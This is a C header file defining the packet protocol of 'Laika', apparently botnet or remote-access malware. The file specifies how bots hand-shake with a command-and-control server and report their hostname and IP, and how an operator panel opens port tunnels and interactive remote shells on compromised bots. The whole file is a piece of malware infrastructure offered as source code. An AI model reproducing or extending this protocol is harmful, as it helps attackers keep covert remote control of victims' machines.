#ifndef LAIKA_PACKET_H #define LAIKA_PACKET_H #include #define LAIKA_MAGIC "LAI\x12" #define LAIKA_MAGICLEN 4 #define LAIKA_MAX_PKTSIZE 4096 #define LAIKA_HOSTNAME_LEN 64 #define LAIKA_IPV4_LEN 22 #define LAIKA_INET_LEN 22 #define LAIKA_SHELL_DATA_MAX_LENGTH 2048 #define LAIKA_MAX_SHELLS 16 /* first handshake between peer & cnc works as so: - peer connects to cnc and sends a LAIKAPKT_HANDSHAKE_REQ with the peer's pubkey, hostname & inet ip - after cnc receives LAIKAPKT_HANDSHAKE_REQ, all packets are encrypted - cnc responds with LAIKAPKT_HANDSHAKE_RES - if peer is an authenticated client (panel), LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ is then sent */ /* encrypted packets are laid out like so: (any packet sent/received where peer->useSecure is true) LAIKAPKT_ID pktID; -- plain text uint8_t nonce[crypto_secretbox_NONCEBYTES]; -- plain text uint8_t body[pktSize + crypto_secretbox_MACBYTES]; -- encrypted with shared key & nonce */ /* any packet ending with *_RES is cnc 2 peer any packet ending with *_REQ is peer 2 cnc if packet doesn't have either, it can be sent & received by both peer & cnc */ enum { /* ==================================================[[ Peer ]]================================================== */ LAIKAPKT_VARPKT, /* layout of LAIKAPKT_VARPKT: * LAIKAPKT_SIZE pktSize; * LAIKAPKT_ID pktID; */ LAIKAPKT_HANDSHAKE_REQ, /* first packet sent by peer & received by cnc */ /* layout of LAIKAPKT_HANDSHAKE_REQ: *NOTE* ALL DATA IN THIS PACKET IS SENT IN PLAINTEXT!! * uint8_t laikaMagic[LAIKA_MAGICLEN]; -- LAIKA_MAGIC * uint8_t majorVer; * uint8_t minorVer; * uint8_t osType; * uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with * char hostname[LAIKA_HOSTNAME_LEN]; -- can be empty (ie. all NULL bytes) * char inet[LAIKA_INET_LEN]; -- can be empty (ie. all NULL bytes) */ LAIKAPKT_HANDSHAKE_RES, /* layout of LAIKAPKT_HANDSHAKE_RES: * uint8_t cncEndian; */ LAIKAPKT_PINGPONG, /* layout of LAIKAPKT_PINGPONG: * NULL (empty packet) */ LAIKAPKT_TUNNEL_OPEN, /* if sent to bot, opens a tunnel to localhost's port. if sent to cnc, signifies you opened the tunnel */ /* layout of LAIKAPKT_TUNNEL_OPEN: * uint16_t port; */ LAIKAPKT_TUNNEL_CLOSE, /* if sent to bot, closes a tunnel to localhost's port. if sent to cnc, signifies you closed the tunnel */ /* layout of LAIKAPKT_TUNNEL_CLOSE: * uint16_t port; */ LAIKAPKT_TUNNEL_CONNECTION_ADD, /* layout of LAIKAPKT_TUNNEL_CONNECTION_ADD: * uint16_t port; * uint16_t id; */ LAIKAPKT_TUNNEL_CONNECTION_RMV, /* layout of LAIKAPKT_TUNNEL_CONNECTION_RMV: * uint16_t port; * uint16_t id; */ LAIKAPKT_TUNNEL_CONNECTION_DATA, /* layout of LAIKAPKT_TUNNEL_CONNECTION_RMV: * uint16_t port; * uint16_t id; * uint8_t data[VAR_PACKET_LENGTH-4]; -- '-4' for the port & id */ LAIKAPKT_SHELL_OPEN, /* if sent to bot, opens a shell. if sent to cnc, signifies you opened a shell */ /* layout of LAIKAPKT_SHELL_OPEN: * uint32_t id; // this field is absent from the panel/auth client * uint16_t cols; * uint16_t rows; */ LAIKAPKT_SHELL_CLOSE, /* if sent to bot, closes a shell. if sent to cnc, signifies a shell was closed */ /* layout of LAIKAPKT_SHELL_CLOSE: * uint32_t id; // this field is absent from the panel/auth client */ LAIKAPKT_SHELL_DATA, /* if sent to bot, writes data to stdin of shell. if sent to cnc, writes to 'stdout' of shell */ /* layout of LAIKAPKT_SHELL_DATA * uint32_t id; // this field is absent from the panel/auth client * char buf[VAR_PACKET_LENGTH]; */ /* ==================================================[[ Auth ]]================================================== */ LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ, /* second packet sent by authenticated peers (panel). there is no response packet */ /* layout of LAIKAPKT_STAGE2_HANDSHAKE_REQ * uint8_t peerType; */ LAIKAPKT_AUTHENTICATED_ADD_PEER_RES, /* notification that a peer has connected to the cnc */ /* layout of LAIKAPKT_AUTHENTICATED_ADD_PEER_RES * uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- pubkey of said bot * char hostname[LAIKA_HOSTNAME_LEN]; * char inet[LAIKA_INET_LEN]; * char ipv4[LAIKA_IPV4_LEN]; * uint8_t peerType; * uint8_t osType; */ LAIKAPKT_AUTHENTICATED_RMV_PEER_RES, /* notification that a peer has disconnected from the cnc */ /* layout of LAIKAPKT_AUTHENTICATED_RMV_PEER_RES * uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- pubkey of said bot * uint8_t peerType; */ LAIKAPKT_AUTHENTICATED_SHELL_OPEN_REQ, /* panel requesting cnc open a shell on bot. there is no response packet, shell is assumed to be open */ /* layout of LAIKAPKT_AUTHENTICATE_OPEN_SHELL_REQ * uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- pubkey of said bot * uint16_t cols; * uint16_t rows; */ LAIKAPKT_MAXNONE }; typedef uint8_t LAIKAPKT_ID; typedef uint16_t LAIKAPKT_SIZE; #ifdef DEBUG const char* laikaD_getPacketName(LAIKAPKT_ID); #endif #endif